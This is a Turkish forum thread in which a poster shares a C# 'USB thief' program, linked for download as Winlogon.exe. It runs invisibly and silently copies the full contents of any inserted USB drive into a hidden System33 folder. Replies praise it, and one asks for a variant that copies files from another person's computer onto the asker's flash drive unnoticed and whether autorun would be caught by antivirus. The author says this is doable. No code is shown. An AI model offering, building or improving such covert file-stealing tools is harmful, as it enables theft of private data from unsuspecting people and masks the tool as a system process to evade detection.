C# - USB Hırsızı For TBT :) [Güncellendi]
-
kroo bunu yazdı:
-----------------------------öncelikle tebrik ederim
yalnız işlem tamamlandığında bi uyarı gösterse ne biliyim tek bip gibi
artı güvenli çıkar dediğinde kullanıcı çıkaramayacaktır deil mi buna da bişi bulmak lazım
-----------------------------Çıkar deyince çıkarır sanırım, hiç denemedim :) Şu anda da deneyesim yok.
Ama tahminim, sadece o anda kopyalanan dosya kopyalanmaz... Hem güvenli çıkar deyip çıkaran var mı Türkiye'de ? :)
-
Evet arkadaşlar sonunda istediğiniz şekilde yaptım ve birkaç yeni özellik ekledim.
Sıkıştırılmış dosyaları (zip, rar) Compressed adlı klasöre kopyalıyor.
Programı açınca direk görünmez oluyor ve 5dkda bir USB kontrolü yapıyor. Eğer USB varsa, tüm içeriği C:\Windows\System33 içerisine kopyalıyor... Aşağıdaki linkten indirebilirsiniz;
http://rapidshare.com/files/267822032/Winlogon.exe
Ayrıca çok istek olursa, yeni sürümünü aşağıdaki gibi yapmayı planlıyorum...

-
Allah senden razı olsun. Çok büyük işlere yarıyacak.
-
BiUyeOlamadim bunu yazdı:
-----------------------------
Allah senden razı olsun. Çok büyük işlere yarıyacak.
-----------------------------Amin hocam cümlemizden, inşallah... :P
-
gene ben :D
teşekkür ederim yalnız bunun tam tersini yapman da mümkün mü
mesela adam bakmıyor flashımı bir an adamın usbsine takcam istediğim uzantıdai dosyayı usb me kopyalıyacak
autorun sorun mu çıkarır ? (antivirler çakar mı?)
-
kroo bunu yazdı:
-----------------------------gene ben :D
teşekkür ederim yalnız bunun tam tersini yapman da mümkün mü
mesela adam bakmıyor flashımı bir an adamın usbsine takcam istediğim uzantıdai dosyayı usb me kopyalıyacak
autorun sorun mu çıkarır ? (antivirler çakar mı?)
-----------------------------Yoo yapılabilir fakat bilgisayarın neresindeki dosyaları senin USB'ne kopyalayacak ?
Ayrıca yapılabilmesi için, bilgisayarda o progam yüklü olması gerekir. Şöyle de olur ama uğraşmak lazım;
USB'yi takar takmaz o program çalışırsa, istediğin yapılabilir...
-
sonunda böyle konular görebilmek ne güzel :) eline sağlık hoca
-
o6u2 bunu yazdı:
-----------------------------
sonunda böyle konular görebilmek ne güzel :) eline sağlık hoca
-----------------------------Teşekkürler.
Valla hocam, inan ki birkaç gün önceydi galiba. Tahribat Programlama Rüzgarı başlığı altında 2 konu açılmıştı. Ben de düşündüm, yapiyim bir tane TBT için ne olacak diye :)
Bunu yapmaya karar verdim ve yaptım. Umarım kullanılır.
Ayrıca aklına güzel fikir gelen olursa bildirsin, yapmaya çalışırım. TBT'ye programlar yapalım biraz yaa :)
-
saol hocam guzelmis...
ilki calisdi, ama 2. sefer verdigin program bende calismiyor nedense..?
-
mamii bunu yazdı:
-----------------------------Evet arkadaşlar sonunda istediğiniz şekilde yaptım ve birkaç yeni özellik ekledim.
Sıkıştırılmış dosyaları (zip, rar) Compressed adlı klasöre kopyalıyor.
Programı açınca direk görünmez oluyor ve 5dkda bir USB kontrolü yapıyor. Eğer USB varsa, tüm içeriği C:\Windows\System33 içerisine kopyalıyor... Aşağıdaki linkten indirebilirsiniz;
http://rapidshare.com/files/267822032/Winlogon.exe
Ayrıca çok istek olursa, yeni sürümünü aşağıdaki gibi yapmayı planlıyorum...

-----------------------------bu ikinci verdiğin programı çalıştırdığımda sağ altta simgesi çıkmıyor, çalıştığını windows klasöründe system33 dosyasını oluşturduğunda anladım. demek ki çalışmaya başladı diye düşündüm. ama nasıl kapanacak bu program. devamlı alt maskede çalışıyor mu? yoksa kapatmak için kısayol mu yarattın???